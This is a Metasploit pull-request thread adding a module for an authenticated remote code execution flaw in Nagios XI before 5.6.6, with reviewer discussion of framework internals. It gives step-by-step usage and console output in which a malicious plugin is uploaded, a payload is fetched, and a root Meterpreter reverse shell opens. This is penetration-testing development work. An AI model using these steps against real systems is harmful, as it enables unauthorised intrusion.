Nagiosxi authenticated rce
rapid7/metasploit-framework pull request #13004
Opened 2020-02-27 15:27 UTC by kalba-security

## About 
This change adds a new module to /modules/exploits/linux/http/ that exploits a vulnerability in Nagios XI before 5.6.6 in order to execute arbitrary commands as root. The change also adds documentation for this module. The module is based on this exploit: https://github.com/jakgibb/nagiosxi-root-rce-exploit

## Vulnerable system
Nagios XI before 5.6.6.

## Verification Steps
1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/linux/http/nagiosxi_authenticated_rce`
4. Do: `set RHOSTS [IP]`
5. Do: `set SRVHOST [IP]`
6. Do: `set USERNAME [username]`
7. Do: `set PASSWORD [password]`
8. Do: `set payload [payload]`
9. Do: `set LHOST [IP]`
10. Do: `set LPORT [port]`
11. Do: `exploit`

## Options
1. `USERNAME`. The username to authenticate with. This user should have permissions to modify plugins. The default setting is `nagiosadmin`, which is the default admin account for Nagios XI systems.
2. `PASSWORD`. The password to authenticate with.
3. `Timeout`. The number of seconds to wait for the exploit to connect back. This value is set at 10 by default because it usually takes a while for the plugin to execute after the GET request to rofile.php?cmd=download is sent. If the module fails with a timeout error the first time, just run it again with a higher Timeout value.

## Scenarios
```
msf5 exploit(linux/http/nagiosxi_authenticated_rce) > show options

Module options (exploit/linux/http/nagiosxi_authenticated_rce):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   PASSWORD   P@ssw0rd!             yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.1           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                    yes       The target port (TCP)
   SRVHOST    192.168.1.2           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                     yes       Base path to NagiosXI
   Timeout    10                    yes       Number of seconds to wait for the exploit to connect back)
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin           yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

msf5 exploit(linux/http/nagiosxi_authenticated_rce) > run
[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Found Nagios XI application with version 5.6.5.
[*] Starting web server
[*] Using URL: http://192.168.1.2:8080/eFFP5lYvZ8eCnR0
[*] Uploading malicious 'check_ping' plugin...
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting for the plugin to request the final payload...
[*] 192.168.91.1:80 - Payload request received: /eFFP5lYvZ8eCnR0
[*] Sending payload...
[*] Sending stage (3021284 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.1:56510) at 2020-02-27 16:27:49 +0100
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.
[*] Server stopped.
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

```

2020-02-27 16:16 UTC, kalba-security commented
I should mention that while this module takes advantage of the Msf::Exploit::Remote::HttpServer::HTML mixin, I am not using it in the standard way (with the primer method) because the server is not needed for all payloads. As I mention in the documentation, the module uses a different delivery method for cmd/unix/reverse_bash than for other payloads. This in case the target application is running on a limited installation of CentOS or another system that doesn't support wget (which the other payloads rely upon). The module currently starts the server only after verifying the payload. While this works well, I have not been able to get rid of one minor bug, namely that the module always prints the following lines upon starting:
```
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
```
I have been poking around the framework for a solution to this, but haven't been able to find one, so I hope someone here will know how to fix this. Please let me know if I can help out with anything going forward!

2020-02-28 08:57 UTC, timwr commented
@kalba-security without looking into the details too much, that error often occurs if the `exploit` function of your module returns before a session comes back. You can increase the amount of time the module waits for the session with `set WfsDelay 60` (60 seconds). If that fixes it consider including it as a default option.

2020-02-28 08:58 UTC, timwr commented
Oops it looks like your doing the same thing with the TIMEOUT option. It's likely something else.

2020-02-28 09:11 UTC, kalba-security commented
Yeah the thing is that these two lines are always printed first, before anything else, and then the module just runs as expected. For instance, if I run the module against a system that isn't running this application, this is printed to the screen:
```
msf5 exploit(linux/http/nagiosxi_authenticated_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/nagiosxi_authenticated_rce) > 
[*] Started reverse TCP handler on 192.168.1.2:4444 
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
```
While it shows the prompt twice, I ran it only once.

2020-02-28 09:36 UTC, timwr commented
Fiddly: I think including the HttpServer mixin tries to make this a job (e.g a browser exploit) when it should still be a normal exploit.
You could try override that with the following hack?:
```
def passive?
    false
end
```
There is probably an easier/better way though!

2020-02-28 11:04 UTC, kalba-security commented
> Fiddly: I think including the HttpServer mixin tries to make this a job (e.g a browser exploit) when it should still be a normal exploit.
> You could try override that with the following hack?:
> 
> ```
> def passive?
>     false
> end
> ```
> 
> There is probably an easier/better way though!

Hey, I just added the line ```'Stance'          => Stance::Aggressive,``` to the initialize method and that seems to work. It seems that some other modules do this to for the same reason. Thanks for pointing this out!!

2020-03-03 19:45 UTC, cdelafuente-r7 commented
The `Exploit::Remote::SocketServer` mixin, which comes from `Exploit::Remote::HttpServer::HTML`, automatically sets the stance to passive: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/socket_server.rb#L17
```ruby
  super(update_info(info,
    'Stance' => Msf::Exploit::Stance::Passive))
```
So, explicitly setting `'Stance' => Stance::Aggressive` should work.

2020-03-04 07:19 UTC, kalba-security commented
> The `Exploit::Remote::SocketServer` mixin, which comes from `Exploit::Remote::HttpServer::HTML`, automatically sets the stance to passive: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/socket_server.rb#L17
> 
> ```ruby
>   super(update_info(info,
>     'Stance' => Msf::Exploit::Stance::Passive))
> ```
> 
> So, explicitly setting `'Stance' => Stance::Aggressive` should work.

Great, thanks for clarifying!

2020-03-04 19:01 UTC, cdelafuente-r7 requested changes
@kalba-security, thanks for this great contribution! I have some suggestions and comments, when you get a chance.

Also, I did some tests with two different versions of Nagios XI and got different results:
- Version `5.6.5` -- I got the same results than you
- Version `5.4.10` -- Apparently, the `execute_payload` method does not trigger the execution. However, the payload gets executed randomly after a period of time (up to 5 minutes), without the need to call `execute_payload`. I got a session, but it is not a root session:
```
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.2.101:4444
[*] Found Nagios XI application with version 5.4.10.
[*] Starting web server
[*] Using URL: http://192.168.2.101:8080/qJiYJVqf3S
[*] Uploading malicious 'check_ping' plugin...
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting for the plugin to request the final payload...
[*] 127.0.0.1:80 - Payload request received: /qJiYJVqf3S
[*] Sending payload...
[*] Sending stage (3021284 bytes) to 192.168.2.101
[*] Meterpreter session 19 opened (192.168.2.101:4444 -> 192.168.2.101:65157) at 2020-03-04 19:58:33 +0100
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.
[*] Server stopped.

meterpreter > getuid
Server username: uid=500, gid=500, euid=500, egid=500

```
Here is the Dockerfile I used, if you're interested in testing: https://gitlab.com/mavenquist/docker-nagios-xi

2020-03-06 14:11 UTC, kalba-security commented
@cdelafuente-r7 Thanks so much for your elaborate feedback!! I learned a lot from it, so really appreciate it. I think this last commit should cover everything you mentioned. I used cmdstager mixin with different targets like you said and that works like a charm! I also incorporated the WfsDelay - cleanup combo. I actually planned to ask how to get rid of the double Content-Type header but I forgot in the end. I fixed that too now. I also updated the documentation to reflect these changes.

Interesting note about the older version of Nagios XI you tested. I don't have any experience with docker and haven't had time to set it up and test this myself. Would you like to mention this in the documentation?

Btw, I had to insert ("& disown) into the cmd for payloads using the cmdstager mixin in order to get cleanup to work. That got me wondering why the cmdstager doesn't disown the payload by default after executing it? Wouldn't that make sense in most cases? Or Is there a specific scenario in which this could cause an issue?

Also, is there a way for users to manually increase WfsDelay in case the module times out? I haven't encountered this while testing though, so I don't know if this would actually be necessary.

2020-03-06 21:31 UTC, cdelafuente-r7 requested changes
Glad it helped! Thank you for your quick answer.
I just added a few other suggestions that, I think, would improve your code. Let me know what you think.

Also, if you could mention the difference with the older version of Nagios XI in the documentation, that would be great! Thanks!

Oh and the `WfsDelay` is just an advanced option (enter `show advanced` in msfconsole). It can be set like an normal option: `set WfsDelay 60`

2020-03-09 10:03 UTC, kalba-security commented
@cdelafuente-r7 thanks for your additional suggestions! Once again, these were super helpful and allowed me to actually learn more about the framework.

This commit should cover all extra suggestions you mentioned:
- The @plugin_installed variable is now used to make sure cleanup is run only when necessary.
- The cmdstager now runs in the background and the flavor is no longer restricted to :wget. (this indeed ensures that cleanup works)
- The arch, platform and default payload are now set separately for each target.
- The changes to the ARCH_CMD payload are now made in the info hash instead of in the execute method.
- The cmd string is no longer altered for the other targets (instead the cmdstager now runs in the background as mentioned above)
- The initialize method now includes a call to import_target_defaults to ensure the DefaultOptions for the default target are set when the module gets initialized.
- The module description and the documentation no longer mention the use of an HTTP Server but instead refer to the use of a command stager for certain targets.
- The documentation has been updated to mention possibly different results for Nagios XI 5.4.10 and other older versions.
Finally, I added some info to the documentation about the WfsDelay and CMDSTAGER::FLAVOR options for troubleshooting purposes.

Please let me know what you think and if I can help with anything else!

2020-03-09 10:32 UTC, kalba-security commented
I don't get why the sanity test execution keeps failing, since I made only very minor changes. Any what the reason could be @cdelafuente-r7?

2020-03-09 13:50 UTC, jmartin-r7 commented
@msjenkins-r7 test this please.

2020-03-09 14:52 UTC, cdelafuente-r7 approved these changes

2020-03-09 14:53 UTC, cdelafuente-r7 commented
Thanks @jmartin-r7! It is passing again.

2020-03-09 14:56 UTC, cdelafuente-r7 commented
@kalba-security, there were an issue with the sanity check but it is okay now.
Thanks for implementing the suggestions! I will go ahead and land it.

2020-03-09 14:59 UTC, merged

2020-03-09 15:22 UTC, cdelafuente-r7 commented
# Release Notes
This module allows you to exploit a remote code execution vulnerability in Nagios XI, an application, service and network monitoring software. Versions before 5.6.6 are vulnerable and an account with permissions to modify plugins in Nagios XI is required. The exploit consists in uploading a malicious plugin and sending a specially crafted HTTP request to trigger code execution.